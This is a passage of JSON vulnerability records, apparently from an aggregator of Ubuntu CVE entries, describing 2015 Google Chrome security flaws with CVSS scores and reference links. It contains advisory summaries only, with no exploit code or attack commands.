"2015-05-20T00:00:00", "id": "UB:CVE-2015-1259", "href": "https://ubuntu.com/security/CVE-2015-1259", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:36", "description": "Use-after-free vulnerability in the SVG implementation in Blink, as used in\nGoogle Chrome before 43.0.2357.65, allows remote attackers to cause a\ndenial of service or possibly have unspecified other impact via a crafted\ndocument that leverages improper handling of a shadow tree for a use\nelement.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1256", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1256"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1256", "href": "https://ubuntu.com/security/CVE-2015-1256", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:35", "description": "Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65\nallow attackers to cause a denial of service or possibly have other impact\nvia unknown vectors.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1265", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1265"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1265", "href": "https://ubuntu.com/security/CVE-2015-1265", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:45", "description": "Use-after-free vulnerability in the MutationObserver::disconnect function\nin core/dom/MutationObserver.cpp in the DOM implementation in Blink, as\nused in Google Chrome before 42.0.2311.135, allows remote attackers to\ncause a denial of service or possibly have unspecified other impact by\ntriggering an attempt to unregister a MutationObserver object that is not\ncurrently registered.", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1243", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1243"], "modified": "2015-04-30T00:00:00", "id": "UB:CVE-2015-1243", "href": "https://ubuntu.com/security/CVE-2015-1243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:35", "description": "Cross-site scripting (XSS) vulnerability in Google Chrome before\n43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web\nscript or HTML via crafted data that is improperly handled by the Bookmarks\nfeature.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1264"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1264", "href": "https://ubuntu.com/security/CVE-2015-1264", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:16:36", "description": "Google Chrome before 43.0.2357.65 relies on libvpx code that was not built\nwith an appropriate --size-limit value, which allows remote attackers to\ntrigger a negative value for a size field, and consequently cause a denial\nof service or possibly have unspecified other impact, via a crafted frame\nsize in VP9 video data.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | build parameter is specific for chrome build\n", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1258", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1258"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1258", "href": "https://ubuntu.com/security/CVE-2015-1258", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:36", "description": "platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google\nChrome before 43.0.2357.65, does not initialize a certain width field,\nwhich allows remote attackers to cause a denial of service or possibly have\nunspecified other impact via crafted Unicode text.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1262", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1262"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1262", "href": "https://ubuntu.com/security/CVE-2015-1262", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:37", "description": "core/dom/Document.cpp in Blink, as used in Google Chrome before\n43.0.2357.65, enables the inheritance of the designMode attribute, which\nallows remote attackers to bypass the Same Origin Policy by leveraging the\navailability of editing.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1254", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1254"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1254", "href": "https://ubuntu.com/security/CVE-2015-1254", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:16:36", "description": "platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in\nBlink, as used in Google Chrome before 43.0.2357.65, does not properly\nhandle an insufficient number of values in an feColorMatrix filter, which\nallows remote attackers to cause a denial of service (container overflow)\nor possibly have unspecified other impact via a crafted document.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1257", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1257"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1257", "href": "https://ubuntu.com/security/CVE-2015-1257", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:36", "description": "Use-after-free vulnerability in\ncontent/renderer/media/webaudio_capturer_source.cc in the WebAudio\nimplementation in Google Chrome before 43.0.2357.65 allows remote attackers\nto cause a denial of service (heap memory corruption) or possibly have\nunspecified other impact by leveraging improper handling of a stop action\nfor an audio track.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1255", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1255"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1255", "href": "https://ubuntu.com/security/CVE-2015-1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:45", "description": "Multiple unspecified vulnerabilities in Google Chrome before 42.0.2311.135\nallow attackers to cause a denial of service or possibly have other impact\nvia unknown vectors.", "cvss3": {}, "published": "2015-04-30T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1250", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1250"], "modified": "2015-04-30T00:00:00", "id": "UB:CVE-2015-1250", "href": "https://ubuntu.com/security/CVE-2015-1250", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:51", "description": "The URLRequest::GetHSTSRedirect function in url_request/url_request.cc in\nGoogle Chrome before 42.0.2311.90 does not replace the ws scheme with the\nwss scheme whenever an HSTS Policy is active, which makes it easier for\nremote attackers to obtain sensitive information by sniffing the network\nfor WebSocket traffic.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1244", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1244"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1244", "href": "https://ubuntu.com/security/CVE-2015-1244", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:16:35", "description": "Use-after-free vulnerability in the SpeechRecognitionClient implementation\nin the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote\nattackers to execute arbitrary code via a crafted document.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1251", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1251", "href": "https://ubuntu.com/security/CVE-2015-1251", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:38", "description": "core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in\nBlink, as used in Google Chrome before 43.0.2357.65, allows remote\nattackers to bypass the Same Origin Policy via crafted JavaScript code that\nappends a child to a SCRIPT element, related to the insert and\nexecuteReparentTask functions.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1253", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1253"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1253", "href": "https://ubuntu.com/security/CVE-2015-1253", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:37", "description": "Multiple use-after-free vulnerabilities in\ncontent/renderer/media/user_media_client_impl.cc in the WebRTC\nimplementation in Google Chrome before 43.0.2357.65 allow remote attackers\nto cause a denial of service or possibly have unspecified other impact via\ncrafted JavaScript code that executes upon completion of a getUserMedia\nrequest.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1260", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1260"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1260", "href": "https://ubuntu.com/security/CVE-2015-1260", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:36", "description": "The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does\nnot use an HTTPS session for downloading a Hunspell dictionary, which\nallows man-in-the-middle attackers to deliver incorrect spelling\nsuggestions or possibly have unspecified other impact via a crafted file.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1263"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1263", "href": "https://ubuntu.com/security/CVE-2015-1263", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:16:50", "description": "The ReduceTransitionElementsKind function in hydrogen-check-elimination.cc\nin Google V8 before 4.2.77.8, as used in Google Chrome before 42.0.2311.90,\nallows remote attackers to cause a denial of service or possibly have\nunspecified other impact via crafted JavaScript code that leverages \"type\nconfusion\" in the check-elimination optimization.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1242", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1242"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1242", "href": "https://ubuntu.com/security/CVE-2015-1242", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:50", "description": "Use-after-free vulnerability in the OpenPDFInReaderView::Update function in\nbrowser/ui/views/location_bar/open_pdf_in_reader_view.cc in Google Chrome\nbefore 41.0.2272.76 might allow user-assisted remote attackers to cause a\ndenial of service (heap memory corruption) or possibly have unspecified\nother impact by triggering interaction with a PDFium \"Open PDF in Reader\"\nbutton that has an invalid tab association.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1245", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1245"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1245", "href": "https://ubuntu.com/security/CVE-2015-1245", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:51", "description": "The SearchEngineTabHelper::OnPageHasOSDD function in\nbrowser/ui/search_engines/search_engine_tab_helper.cc in Google Chrome\nbefore 42.0.2311.90 does not prevent use of a file: URL for an OpenSearch\ndescriptor XML document, which might allow remote attackers to obtain\nsensitive information from local files via a crafted (1) http or (2) https\nweb site.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1247", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1247"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1247", "href": "https://ubuntu.com/security/CVE-2015-1247", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:16:51", "description": "The FileSystem API in Google Chrome before 40.0.2214.91 allows remote\nattackers to bypass the SafeBrowsing for Executable Files protection\nmechanism by creating a .exe file in a temporary filesystem and then\nreferencing this file with a filesystem:http: URL.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1248", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1248"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1248", "href": "https://ubuntu.com/security/CVE-2015-1248", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:16:51", "description": "gpu/blink/webgraphicscontext3d_impl.cc in the WebGL implementation in\nGoogle Chrome before 42.0.2311.90 allows remote attackers to cause a denial\nof service (out-of-bounds read) via a crafted WebGL program that triggers a\nstate inconsistency.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1240", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1240"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1240", "href": "https://ubuntu.com/security/CVE-2015-1240", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:16:51", "description": "Blink, as used in Google Chrome before 42.0.2311.90, allows remote\nattackers to cause a denial of service (out-of-bounds read) via unspecified\nvectors.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1246", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1246"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1246", "href": "https://ubuntu.com/security/CVE-2015-1246", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:16:35", "description": "common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does\nnot properly handle wraps, which allows remote attackers to bypass a\nsandbox protection mechanism or cause a denial of service (out-of-bounds\nwrite) via vectors that trigger a write operation with a large amount of\ndata, related to the PartialCircularBuffer::Write and\nPartialCircularBuffer::DoWrite functions.", "cvss3": {}, "published": "2015-05-20T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1252", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1252"], "modified": "2015-05-20T00:00:00", "id": "UB:CVE-2015-1252", "href": "https://ubuntu.com/security/CVE-2015-1252", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:17:08", "description": "Google Chrome before 41.0.2272.118 does not properly handle the interaction\nof IPC, the Gamepad API, and Google V8, which allows remote attackers to\nexecute arbitrary code via unspecified vectors.\n\n#### Bugs\n\n * <https://code.google.com/p/chromium/issues/detail?id=469058>\n * <https://launchpad.net/bugs/1442588>\n", "cvss3": {}, "published": "2015-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1233", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233"], "modified": "2015-04-01T00:00:00", "id": "UB:CVE-2015-1233", "href": "https://ubuntu.com/security/CVE-2015-1233", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:29:34", "description": "Race condition in gpu/command_buffer/service/gles2_cmd_decoder.cc in Google\nChrome before 41.0.2272.118 allows remote attackers to cause a denial of\nservice (buffer overflow) or possibly have unspecified other impact by\nmanipulating OpenGL ES commands.\n\n#### Bugs\n\n * <https://code.google.com/p/chromium/issues/detail?id=468936>\n * <https://launchpad.net/bugs/1442588>\n", "cvss3": {}, "published": "2015-04-01T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1234", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1234"], "modified": "2015-04-01T00:00:00", "id": "UB:CVE-2015-1234", "href": "https://ubuntu.com/security/CVE-2015-1234", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:16:51", "description": "Google Chrome before 42.0.2311.90 does not properly consider the\ninteraction of page navigation with the handling of touch events and\ngesture events, which allows remote attackers to trigger unintended UI\nactions via a crafted web site that conducts a \"tapjacking\" attack.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1241", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1241"], "modified": "2015-04-19T00:00:00", "id": "UB:CVE-2015-1241", "href": "https://ubuntu.com/security/CVE-2015-1241", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:16:52", "description": "Use-after-free vulnerability in the RenderFrameImpl::OnMessageReceived\nfunction in content/renderer/render_frame_impl.cc in Google Chrome before\n42.0.2311.90 allows remote attackers to cause a denial of service or\npossibly have unspecified other impact via vectors that trigger renderer\nIPC messages during a detach operation.", "cvss3": {}, "published": "2015-04-19T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1237", 